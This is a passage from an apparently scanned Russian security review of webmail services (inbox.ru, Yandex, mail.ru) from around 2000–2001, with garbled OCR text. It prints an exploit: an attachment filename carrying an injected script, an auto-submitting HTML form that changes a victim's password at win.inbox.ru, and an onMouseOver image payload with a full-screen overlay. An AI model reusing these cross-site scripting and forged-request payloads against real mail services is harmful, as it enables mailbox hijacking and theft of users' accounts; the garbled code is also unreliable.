Раздел: Документация
0 ... 39 40 41 42 43 44 45 ... 169 присоединенного файла (содержание письма особой роли не играет), аттач не должен иметь расширение htm, html или txt, как показано ниже. Content-Type: image/gif; charset=us-ascii name=»test.gif» Content-Transfer-Encoding: base64 Content-Disposition: inline filename=»te < script > locaton.href=»http://ДОМЕН/editprofil.html»)< /script > st.gif» editprofil.html ( не забудьте отредактировать ДОМЕН, ИМЯ ПОЛЬЗОВАТЕ-ЛЯ и НОВЫЙ ПАРОЛЬ) <html> <body> . <form methodpost action=»http://win.inbox.ru/cgi-bin/modifyuser?modify»> <input type=»hidden» name=»Username» value=» ИМЯ ПОЛЬ-ЗОВАТЕЛЯ «> <input type=»text» name=»RealName» value=»A. V. Komlni»> <input type=»text» <inputHO- ВЫЙ ПАРОЛЬ «> <input type=»password» name=»Password Verify» value=» НОВЫЙ ПАРОЛЬ «> <input type=checkbox name=»Flags-DoNotKeepMail» > He сохранять почту при пересь:лке<Ьг> <input<input type=»reset» уа1ие=»Восстановить»> </form> <SCRIPT LANGUAGE=»JavaScript»> document.forms[0].submit(); </script> </body> </html> 128 Неочевидные недостатки. Требует лично заходить на сервер не реже, чем раз в полгода, иначе ящик будет отключен и его сможет захватить кто угодно. Безопасность. Достоинства. Возможность нормальной работы без поддержки Javascript. Итог. Веб-интерфейсом лучше не пользоваться до его доработки и смены отношения к безопасности или отключать поддержку сценариев (Javascript) перед просмотром писем и не открывать ссылок в письме. Yandex.ri (narod.ru) Заявленные возможности. Размер почтового ящика - 5 Mb. Возможность работы по WWW-интерфейсу. Поддерживает стандартные протоколы РОРЗ и SMTP. Поддерживает пересылку. Поддерживает фильтрацию. Встроенной антивирусной проверки нет. Защищенных соединений, увы, не поддерживает. Работает довольно быстро. История. Эта служба была запущена относительно недавно — в конце 2000 года, но уже послужила причиной нескольких публикаций на RSN Forume, посвященных грубым ошибкам в ее системе безопасности. А. Большаковым была выявлена плохая фильтрация тегов «script» поле Subject и имени присоединённых файлов. Вместе с никак незащищенной схемой смены пароля это позволило силами посетителей RSN Foruma написать простой эксплойт, захватывающий почтовый ящик пользователя при простом открытии письма. Службе поддержки yandex.ru потребовалось всего несколько дней, чтобы устранить ошибки с конкретными полями и тегами, но, увы, механизм смены пароля серьезных изменений не претерпел, что позволяет успешно повторить попытку при обнаружении новых ошибок в фильтрации. Безопасность. Очевидные недостатки: -При регистрации предлагает нестойкие секретные вопросы (общая болезнь). -Нормальная работа сервиса невозможна без включенной поддержки Javascript, а механизм смены пароля никак не защищен, что позволяет при наличии дырки в фильтрации скриптов сменить пароль при открытии письма. 280 129 Найти новую дырку оказалось нетрудно. Не фильтруются обработчики событий, поэтому при подстановке в тело письма ссылки на рисунок вида: <img src-»about:any» height=1600 wicith-1600 onMouseOver= любой код для эксплойта; return true; >, можно выполнить любой код эксплойта. Подстановка впереди тега <div style=»position:absolute;top:0; left:С;background-color :#FFFFFF;padding:8px» > позволит сразу занять весь экран, чтобы не ждать, пока жертва двинет мышкой. Для захвата ящика после небольшой модификации подойдет старый эксплойт. Неочевидные недостатки. Не смотрел: вполне достаточно очевидных. Безопасность. Достоинства. Можно включить пересылку или работать по РОРЗ /SMTP, забыв о Веб-интерфейсе. Итог. Веб-интерфейсом вообще лучше не пользоваться до коренной его переработки и смены политики безопасности. Сервер быстрый и удобный, ничто не мешает вам воспользоваться стандартными методами работы с почтой. MAIL.RU Самый популярный российский почтовый сервис (и один из старейших). Короткое и очевидное имя сервиса. Конечно, все простые имена пользователей давно разобраны. Мощная служба поддержки. Заявленные возможности. Размер почтового ящика — 2 Mb. Ожидается увеличение. Возможность работы по WWW-интерфейсу. Поддерживает стандартные протоколы РОРЗ и SMTP. Поддерживает пересылку (до трех адресов). Поддерживает фильтрацию. Встроенной антивирусной проверки нет. Защищенных соединений, увы, не поддерживает. Работает довольно медленно. История. Изначально отношение к политике безопасности было крайне неудовлетворительным. Результат не заставил себя ждать: за 1999, 2000 годы в нем были обнаружены десятки ошибок, включая 130 0 ... 39 40 41 42 43 44 45 ... 169
|